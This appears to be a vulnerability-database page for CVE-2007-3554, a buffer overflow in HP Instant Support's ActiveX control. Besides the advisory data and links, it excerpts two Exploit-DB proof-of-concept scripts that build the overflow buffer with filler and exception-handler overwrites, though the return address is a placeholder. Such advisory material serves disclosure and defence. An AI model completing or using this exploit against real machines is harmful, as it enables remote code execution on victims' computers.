CVE-2007-3554
published 2007-07-04CVE-2007-3554: Stack-based buffer overflow in the HPSDDX Class (SDD) ActiveX control in sdd.dll in HP Instant Support - Driver Check before 1.5.0.3 allows remote attackers to…
PriorityP346high7.6CVSS 2.0
AVNACHAuNCCICAC
EXPLOIT
EPSS
17.87%
96.8th percentile
Stack-based buffer overflow in the HPSDDX Class (SDD) ActiveX control in sdd.dll in HP Instant Support - Driver Check before 1.5.0.3 allows remote attackers to execute arbitrary code via a long argument to the queryHub function.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
HP Instant Support - Driver Check Remote Buffer Overflow (PoC)
exploitdb·2007-07-02
CVE-2007-3554 HP Instant Support - Driver Check Remote Buffer Overflow (PoC)
HP Instant Support - Driver Check Remote Buffer Overflow (PoC)
---
HP Instant Support - Driver Check Remote Buffer Overflow Exploit
author: Carlo Di Dato (aka shinnai)
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 full patched with IE7
Special thanks to:
rgod for his support and friendship
John Morris from HP Software Security for his honesty
str0ke... for being str0ke :)
HP Security Bulletin:
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01077597
buff = String(222, "A")
get_EBP = "cccc"
get_EIP = unescape("aaaa")
buf1 = unescape("bbbb")
second_exception = unescape("%00%00%92%00")
first_exception = unescape("%00%00%92%00")
buf2 = String(4000, "B")
egg = buff + get_EBP + get_EIP + buf1
Exploit-DB
HP Instant Support - ActiveX Control Driver Check Buffer Overflow
exploitdb·2007-04-01
CVE-2007-3554 HP Instant Support - ActiveX Control Driver Check Buffer Overflow
HP Instant Support - ActiveX Control Driver Check Buffer Overflow
---
source: https://www.securityfocus.com/bid/24730/info
HP Instant Support ActiveX control is prone to a remote buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.
Exploiting this issue allows remote attackers to execute arbitrary code in the context of applications using the affected ActiveX control and possibly to compromise affected computers.
buff = String(222, "A")
get_EBP = "cccc"
get_EIP = unescape("aaaa")
buf1 = unescape("bbbb")
second_exception = unescape("%00%00%92%00")
first_exception = unescape("%00%00%92%00")
buf2 = String(4000, "B")
egg = buff + get_EBP + get_EIP + buf1 + second_exception + fir
No writeups or analysis indexed.
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01077597http://osvdb.org/37832http://secunia.com/advisories/25918http://www.securityfocus.com/archive/1/472728/100/0/threadedhttp://www.securityfocus.com/bid/24730http://www.securitytracker.com/id?1018331http://www.shinnai.altervista.org/index.php?mod=02_Forum&group=Exploits&argument=Remote&topic=1183360239.ff.php&page=lasthttp://www.vupen.com/english/advisories/2007/2413https://exchange.xforce.ibmcloud.com/vulnerabilities/35228http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01077597http://osvdb.org/37832http://secunia.com/advisories/25918http://www.securityfocus.com/archive/1/472728/100/0/threadedhttp://www.securityfocus.com/bid/24730http://www.securitytracker.com/id?1018331http://www.shinnai.altervista.org/index.php?mod=02_Forum&group=Exploits&argument=Remote&topic=1183360239.ff.php&page=lasthttp://www.vupen.com/english/advisories/2007/2413https://exchange.xforce.ibmcloud.com/vulnerabilities/35228
2007-07-04
Published